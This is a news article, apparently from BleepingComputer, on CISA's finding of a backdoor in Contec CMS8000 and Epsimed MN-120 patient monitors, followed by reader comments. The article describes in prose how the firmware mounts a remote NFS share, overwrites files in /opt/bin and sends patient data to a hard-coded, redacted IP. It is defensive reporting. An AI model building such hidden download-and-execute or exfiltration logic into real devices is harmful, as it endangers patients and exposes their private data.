The US Cybersecurity and Infrastructure Security Agency (CISA) is warning that Contec CMS8000 devices, a widely used healthcare patient monitoring device, include a backdoor that quietly sends patient data to a remote IP address and downloads and executes files on the device.
Contec is a China-based company that specializes in healthcare technology, offering a range of medical devices including patient monitoring systems, diagnostic equipment, and laboratory instruments.
CISA learned of the malicious behavior from an external researcher who disclosed the vulnerability to the agency. When CISA tested three Contec CMS8000 firmware packages, the researchers discovered anomalous network traffic to a hard-coded external IP address, which is not associated with the company but rather a university.
This led to the discovery of a backdoor in the company's firmware that would quietly download and execute files on the device, allowing for remote execution and the complete takeover of the patient monitors. It was also discovered that the device would quietly send patient data to the same hard-coded address when devices were started.
None of this activity was logged, causing the malicious activity to be conducted secretly without alerting administrators of the devices.
While CISA did not name the university and redacted the IP address, BleepingComputer has learned that it is associated with a Chinese university. The IP address is also hard-coded in software for other medical equipment, including a pregnancy patient monitor from another Chinese healthcare manufacturer.
An FDA advisory about the backdoor also confirmed that it was also found in Epsimed MN-120 patient monitors, which are re-labeled Contec CMS8000 devices.
The backdoor
On analyzing the firmware, CISA found that one of the device's executables, 'monitor,' contains a backdoor that issues a series of Linux commands that enable the device's network adapter (eth0) and then attempts to mount a remote NFS share at the hard-coded IP address belonging to the university.
The NFS share is mounted at /mnt/ and the backdoor recursively copies the files from the /mnt/ folder to the /opt/bin folder.
Source: CISA
The backdoor will continue to copy files from /opt/bin to the /opt folder and, when done, unmount the remote NFS share.
"Though the /opt/bin directory is not part of default Linux installations, it is nonetheless a common Linux directory structure," explains CISA's advisory.
"Generally, Linux stores third-party software installations in the /opt directory and thirdparty binaries in the /opt/bin directory. The ability to overwrite files within the /opt/bin directory provides a powerful primitive for remotely taking over the device and remotely altering the device configuration."
"Additionally, the use of symbolic links could provide a primitive to overwrite files anywhere on the device filesystem. When executed, this function offers a formidable primitive allowing for a third-party operating at the hard-coded IP address to potentially take full control of the device remotely."
While CISA has not shared what these files perform on the device, they said they detected no communication between devices and the hard-coded IP address, only the attempts to connect to it.
CISA says that after reviewing the firmware, they do not believe this is an automatic update feature, but rather than a backdoor planted in the device's firmware.
"By reviewing the firmware code, the team determined that the functionality is very unlikely to be an alternative update mechanism, exhibiting highly unusual characteristics that do not support the implementation of a traditional update feature. For example, the function provides neither an integritychecking mechanism nor version tracking of updates. When the function is executed, files on the device are forcibly overwritten, preventing the end customer—such as a hospital—from maintaining awareness of what software is running on the device. These types of actions and the lack of critical log/auditing data go against generally accepted practices and ignore essential components for properly managed system updates, especially for medical devices."
❖ CISAFurther lending to this being a backdoor by design, CISA found that the devices also began sending patient data to the remote IP address when the devices started.
CISA says that patient data is typically transmitted across a network using the Health Level 7 (HL7) protocol. However, these devices sent the data to the remote IP over port 515, which is usually associated with the Line Printer Daemon (LPD) protocol.
The transmitted data includes the doctor's name, patient ID, patient's name, patient's date of birth, and other information.
Source: CISA
After contacting Contec about the backdoor, CISA was sent multiple firmware images that were supposed to have mitigated the backdoor.
However, each one continued to contain the malicious code, with the company simply disabling the 'eth0' network adapter to mitigate the backdoor. However, this mitigation does not help as the script specifically enables it using the ifconfig eth0 up command before mounting the remote NFS share or sending patient data.
Currently, there is no available patch for devices that removes the backdoor, and CISA recommends that all healthcare organizations disconnect these devices from the network if possible.
Furthermore, the cybersecurity agency recommends organizations check their Contec CMS8000 patient monitors for any signs of tampering, such as displaying information different from a patient's physical state.
BleepingComputer contacted Contec with questions about the firmware and will update the story if we receive a response.
Comments
Grumpower - 1 day ago
Why are these devices connected to the Internet? If for some reason Internet is a must, just blacklist the hardcoded IP in the firewall.
Drags - 1 day ago
These kind of devices, or any IOT/OT devices for that matter, should not have any 0.0.0.0 access
DavieBoy - 1 day ago
Given these from 2022, these devices should have been retired a long time ago:
CVE-2022-36385 - IMPROPER ACCESS CONTROLS - CWE-284
CVE-2022-38100 - UNCONTROLLED RESOURCE CONSUMPTION - CWE-400
CVE-2022-38069 - USE OF HARD-CODED CREDENTIALS - CWE-798
CVE-2022-38453 - ACTIVE DEBUG CODE - CWE-489
CVE-2022-3027 - IMPROPER ACCESS CONTROL - CWE-284
But then again, they're 25% off right now, so you never know :)
cakruege - 1 day ago
Is there also a backdoor in the software of the other devices from that company?
For example for the 24h blood pressure monitor?
This page:
https://contechealth.com/products/ambulatory-blood-pressure-monitor-nibp-holter-abpm50-usb-software-24-hour-record
links to:
Software download link:
www.dlsoftw.com
Index code:05RK1069
download code for older version: 05wq7041
File: ABPM(F)_V5.3.4_Setup.exe
CRC-32: 987dfa68
MD5: bfc1376253abfb05d5de48b987be65b8
SHA-1: 99412cc4fb08c0e27bc59c7f3ff09a085d244f7a
SHA-256: 641bd924b7c88bde73dc4c8fea1aeeeeff60dabc87de8bd727bed7a6e1ee699d
SHA-512: 88cf9bca47215611b8775a248d77b4173a0ad724b96b186434145fed5f78f5bd4f7e4505365f46c7e1be5627d033d1e6c9d0287d7e737c218e44145ecf1e9973
File: ABPM(F)_V5.3.3_Setup.exe
CRC-32: b45eab17
MD5: 491d86f636717c56e1295a6a8386af45
SHA-1: 375bd2c23afb25802ef2c2562b4ee69fbd281792
SHA-256: ab04f2d80c9e3961e58e39c96abf36b9863bd4d6d75fa531db0d19a8b3564549
SHA-512: 3bbb6d6bdcd36bf5f693f7789082f23175017aae76117a702af2a9872ee5df5fa9d48cc12654a8dab24188dd820877330bb425c2978e095cd8225c4770b95286
Its an InnoSetup which can easily be extract with innounp
jblo - 1 day ago
The headline and grammar in the article reference "two healthcare patient monitors," yet I can only find information in the article regarding a Comtec CMS8000; perhaps I've overlooked something. I am thinking that you intended to also address the recent FDA announcement [https://www.fda.gov/medical-devices/safety-communications/cybersecurity-vulnerabilities-certain-patient-monitors-contec-and-epsimed-fda-safety-communication] regarding the Epsimed MN-120.
Lawrence Abrams - 1 day ago
Yes, I had it in original draft and it was removed by mistake. Adding it back. Thanks.
bernesto - 1 day ago
I can't be the only one who believes we don't have a monopoly on lazy programmers.
Let's use our critical thinking skills here.
A university IP... What do they do at universities? Is it a healthcare university? Aren’t universities are typically involved in R&D and have commercialization programs? In R&D, isn’t there a need to collect and analyze lots of data, especially in healthcare, preferably automatically? Don’t they also typically employ students within the university? Developers, especially good ones, are typically the laziest humans. Lazy equals efficient. But they're humans nonetheless. Forgetful + novice = oversights. Universities, on the other hand, are bureaucratic institutions run by academics, not DevOps or SecOps veterans. And companies are profit-driven by non-tech business people who make stupid decisions. Look recently at SONOS... Cheap labor. Ignore the engineers. Ship it. What could go wrong?
Everyone jumps on the US-good, CCP-bad bandwagon without using common sense. The narrative the US pushes that the CCP wants to track every movement of their citizens and ours often overshadows their practical ability to do so. No different than our own government minimizing its desire to do the same and its ineptitude to do so. $500B data center to create 48h mRNA vaccines? Do they expect us to buy that BS? Especially from Larry and Sam? Larry would surveil his own mother in the bathroom. And Sam is a snake “OpenAI is open for the world good”. Oh please… go f yourself.
Tech bros are dicks. Governments are lie. Politicians are stupid. Democracy is theater. And American’s privacy is a long-dead fallacy. Section 702, the Bank Secrecy Act, Snowden, TikTok... come on. Lawmakers took your privacy rights 50 years ago. And CEOs sold your data back to them and others shortly thereafter. Who reads EULA’s anyway? And dead code in a heart monitor is news?
This was likely just field testing code left over and missed during code review by an underpaid undergrad. Not some nefarious plot to steal your heart rate data—that, mind you, is already freely available “legally” thanks to our own government/HIPAA, HITECH, and the 2.2 million BAA entities with their tens of millions of employees (look up limited datasets and reverse identification)... God forbid you go to China for business of pleasure, get sick, and can’t access your “own” health records… And let’s not forget our our own government-mandated backdoors in our telecommunications the CCP has been loitering in for years that they told you was to protect you from foreign adversaries! Ben F. was right. And this is just what we know about. SMFH.
Are there bad actors in the world? Yes. You elected them. Immoral, self-enriching superstition-following, warmongering, idiot puppets. Watch C-SPAN once in a while. Hackers? The good ones don't leave a trace, and that’s a low bar… and most are just trying to expose the government (aka. The idiots) and corporations (aka The crooks) whose EULA you agreed to, but wouldn’t agree with.
DavidRedekop - 1 day ago
This is the kind of story that highlights the importance of egress control that can be managed with an approach of Zero Trust connectivity, which basically uses DNS as the root of trust, and therefore disallows *any* connection that didn't start with an authorized query from a Protective Resolver. It is simpler than it sounds as it is basically Default Deny All that is actually practical. What is needed and verified good, no problem. Anything else, not.
bernesto - 1 day ago
So true. "Control your own network ingress and egress". Which hospitals with good IT should be doing already. The part that gets me in this article is the 'implied' intent. If it was a known APT group IP, then I would raise both eyebrows. But a university... Meh. 20 years in the industry, and I still get surprised by the quality of code released into the wild by US coders - the hacks, workarounds, and just plain laziness. I'm not proud, I cringe when I look at code I wrote a decade ago "Who wrote this crap... oh..." LMAO.
DavidRedekop - 1 day ago
We won't have fewer of these stories coming out in the future. Even with public policy changes, we will have years and decades of legacy equipment that will never be discovered to be breached, but actual outgoing unauthorized and unintended connections can reliably be blocked in 2025.